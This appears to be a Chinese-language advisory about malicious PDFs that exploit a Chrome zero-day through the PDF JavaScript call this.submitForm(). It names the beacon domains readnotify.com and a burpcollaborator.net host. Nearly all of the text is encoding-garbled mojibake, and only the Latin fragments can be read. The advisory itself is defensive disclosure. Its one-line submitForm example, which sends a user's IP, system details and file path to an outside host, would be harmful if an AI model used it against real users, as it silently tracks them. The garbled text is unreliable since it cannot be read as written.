¶ñÒâPDFÎļþÀûÓÃChromeä¯ÀÀÆ÷0day·ì϶°²È«¹«¸æ
°ä²¼¹¦·ò 2019-03-01·ì϶±àºÅºÍ¼¶±ð
CVE±àºÅ£ºÔÝÎÞ£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬ CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨
Ó°ÏìÁìÓò
ÊÜÓ°Ïì°æ±¾£º
Google Chromeä¯ÀÀÆ÷ËùÓа汾
·ì϶¸ÅÊö
½üÆÚ£¬À´×Ô¹ú±íµÄ°²È«×êÑÐÈËÔ±ÔÚÒ°±í¼ì²âµ½¶à¸öPDF¶ñÒâÑù±¾¡£ÕâЩÑù±¾ÀûÓÃÁËChromeä¯ÀÀÆ÷µÄ0day·ì϶£¬ÒÔʵÏÖ×·×ÙÓû§²¢ÍµÍµÄ³Ð©ÍøÂçÓû§ÐÅÏ¢µÄÖ÷ÕÅ¡£
Ŀǰ·¢ÏÖÁËÁ½×éÀûÓÃChromeÁãÈÕ·ì϶µÄ¶ñÒâPDFÎļþ£¬ÆäÖÐÒ»×éÎļþÔÚ2017Äê10Ô´«²¼£¬ÁíÒ»×éÎļþÔÚ2018Äê9Ô´«²¼¡£µÚÒ»Åú¶ñÒâPDFÎļþ½«Óû§Êý¾Ý·¢Ëͻء°readnotify.com¡±£¬µÚ¶þÅú·¢Ëͻء°zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net¡±¡£
·ì϶µÄ±¾ÔÔÚÓÚthis.submitForm()Õâ¸öPDF Javascript API¡£Ïñthis.submitForm('http://google.com/test')ÕâÑùÒ»¸öµ¥Ò»µÄŲÓþͻᵼÖÂChrome°ÑÓ×ÎÒÐÅÏ¢·¢Ë͵½google.com¡£¿ÉÄܱ»Ð¹Â¶µÄÐÅÏ¢Ô̺¬£º
1.Óû§µÄ¹«¹²IPµØÖ·¡£
2.²Ù×÷ϵͳ£¬Chrome°æ±¾µÈ(ÔÚHTTP POST headerÖÐ)¡£
3.Óû§ÍÆËã»úÉÏPDFÎļþµÄÆëÈ«õè¾¶(ÔÚHTTP POST payloadÖÐ)¡£
µ±Óû§Ê¹ÓÃChromeä¯ÀÀÆ÷´ò¿ªÕâЩ¶ñÒâÑù±¾Ê±£¬Ñù±¾»áÔËÐжñÒâ´úÂ룬ÔÚδ¾Óû§ºË×¼µÄÇé¿öÏ£¬ÒÔHTTP POSTÊý¾Ý°üµÄ´ó¾Ö½«Ò»Ð©Óû§ÐÅÏ¢¾²Ä¬·¢Ë͵½Ö¸¶¨Óò¡°readnotify.com ¡±¡£
³ýÈ¥ÐÅϢй¶ÒÔ±í£¬¸Ã·ì϶ÔÝδ·¢ÏÔìäËüÀûÓ÷½Ê½£¬µ«ºÁÎÞÒÉÄÑ£¬ÕâЩй¶µÄÓû§ÐÅÏ¢Äܹ»Ô®ÊÖ¹¥»÷Õß½øÐиü¶à»î¶¯¡£
½¨¸´½¨Òé
Ŀǰ¸Ã0day·ì϶ÉÐδÓйٷ½²¹¶¡£¬µ«ChromeÍŶӻòÐí½«ÓÚ4Ôµ׽¨¸´¸Ã·ì϶¡£
һʱ»º½â´ëÊ©£º
ÔÚ²¹¶¡°ä²¼Ö®Ç°£¬½¨ÒéÓû§Ê¹ÓÃPDFÔĶÁÆ÷ÀûÓ÷¨Ê½ÔÚ±¾µØ²é¿´PDFÎĵµ£¬Ö±µ½Chrome½¨¸´·ì϶¡£»òÔÚChromeÖдò¿ªPDFÎĵµÊ±¶Ï¿ªÍÆËã»úÓëInternetµÄÏνӡ£
²Î¿¼Á´½Ó
https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html


¾©¹«Íø°²±¸11010802024551ºÅ